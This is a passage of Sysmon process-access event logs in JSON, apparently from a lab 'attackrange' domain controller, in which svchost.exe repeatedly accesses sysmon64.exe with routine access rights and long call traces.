{E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.846","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4309,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.846\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.846","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4310,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.846\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.846","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4311,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.846\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.846","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4312,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.846\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.846","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4313,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.846\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.846","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4314,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.846\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.846","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4315,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.846\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.846","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4316,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.846\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 